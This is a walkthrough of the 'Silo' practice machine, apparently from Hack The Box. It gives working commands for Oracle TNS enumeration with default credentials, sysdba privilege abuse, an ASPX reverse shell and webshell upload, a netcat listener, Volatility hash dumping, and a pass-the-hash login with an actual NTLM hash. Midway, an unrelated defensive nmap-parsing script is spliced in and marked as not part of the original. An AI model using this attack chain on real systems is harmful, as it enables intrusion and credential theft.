Silo (machine, medium) writeup. Tags: OSCP, Volatility, Oracle TNS Listener
nmap -sV -T4 -sS -v -sC -p- -oN Ports 10.10.10.82
# Nmap 7.92 scan initiated Thu May 5 06:28:23 2022 as: nmap -sV -T4 -sS -v -sC -p- -oN Ports 10.10.10.82
Increasing send delay for 10.10.10.82 from 0 to 5 due to 2935 out of 7337 dropped probes since last increase.
Increasing send delay for 10.10.10.82 from 5 to 10 due to 11 out of 19 dropped probes since last increase.
Warning: 10.10.10.82 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.82
Host is up (0.068s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 58s, deviation: 0s, median: 58s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-05-05T10:48:55
|_ start_date: 2022-05-05T10:23:23
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 5 06:48:00 2022 -- 1 IP address (1 host up) scanned in 1177.15 seconds
We can see an IIS server up and an unusual Oracle TNS Listener on port 1521; let's find out more about it.
The first place I looked was HackTricks, where I found some info about it: there is a tool called odat that retrieves information about this service with a single command.
To see how to use it I ran the help command, which lists all the modules:
In my case I ran the all module, which automatically enumerates the service, brute-forcing SIDs, accounts and passwords and checking whether it is vulnerable to some known exploits.
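As an added example (not part of the original writeup), here is a small Python parser for nmap's normal (-oN) output such as the scan above. It extracts the open ports and flags the three findings the rest of this writeup builds on: the exposed Oracle TNS listener, the TRACE method on IIS, and SMB signing not being required. The sample input is a constructed excerpt of the scan output.

```python
import re

# Constructed excerpt of the nmap -oN output shown above (not the full scan).
NMAP_NORMAL_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
"""

# A port line looks like "<port>/<proto> <state> <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return one dict per port line found in nmap normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def exposure_findings(text):
    """Flag the scan results a defender would want to review first."""
    findings = []
    for p in parse_ports(text):
        if p["state"] == "open" and p["service"] == "oracle-tns":
            findings.append(f"{p['port']}/{p['proto']}: Oracle TNS listener reachable; "
                            "restrict it with listener ACLs or a firewall and audit DB accounts")
    # NSE http-methods output: the risky-methods line lists TRACE when it is enabled
    if re.search(r"Potentially risky methods:.*\bTRACE\b", text):
        findings.append("80/tcp: HTTP TRACE is enabled on IIS; disable the verb")
    # NSE smb2-security-mode output: signing optional means NTLM relay is possible
    if "Message signing enabled but not required" in text:
        findings.append("445/tcp: SMB signing not required; require it to stop NTLM relay")
    return findings
```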
odat all -s 10.10.10.82 -p 1521
After a few seconds I had the information needed to try other modules:
Now we know the following:
Looking at the wiki page of the odat GitHub repository, I saw that we can upload files to the IIS server, so I tried the following command to upload an ASPX reverse shell.
odat dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "c:\inetpub\wwwroot\\" shell.aspx /tmp/shell.aspx
But I got this error:
We see that the account obtained from odat does not have enough privileges to upload the file. After reading HackTricks and looking for more info, I saw that we can log in to the database as sysdba using Oracle's sqlplus client with the following command:
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';
sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba';
After logging in to the DB we have to create a user with sysdba privileges so that we can upload files with odat without problems.
I looked up the syntax for it on these two web pages:
See the following image for how I created it.
Next we try to upload a file with the newly created account using odat. I had an ASPX reverse shell ready for the IIS server, so I uploaded it to the root directory of the web server.
Besides the reverse shell, it is important to also upload a webshell: the text file below has an encoding problem, and we can only read it properly if we open it from the webshell.
odat dbmsxslprocessor -s 10.10.10.82 -d XE -U pepe -P pepelu --putFile "c:\inetpub\wwwroot\\" shell2.aspx /tmp/shell.aspx
After uploading it successfully, start a netcat listener and open the shell in the browser.
rlwrap nc -nlvp 8888
With this we can get the user flag.
Inside the user's directory we can see the flag and a text file; let's read it.
To read the text properly, open it from the webshell.
If we follow the link we reach a Dropbox file protected by a password; let's use the password from the text file:
After entering the password we can download this zip file:
Next we unzip it and find a .dmp file. Since the text file said it was a memory dump, we can use Volatility 3 to analyse it, but first we have to install it, so I leave you this link as a guide for Volatility 3.
There are a lot of modules in Volatility, but looking through the guide I found one that dumps the credential hashes; here is the command to use with the file.
vol -f SILO-20180105-221806.dmp windows.hashdump
After that we get the stored hashes, and with these we can try to log in using pass-the-hash.
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd.exe
After that we are Administrator and can read the root flag.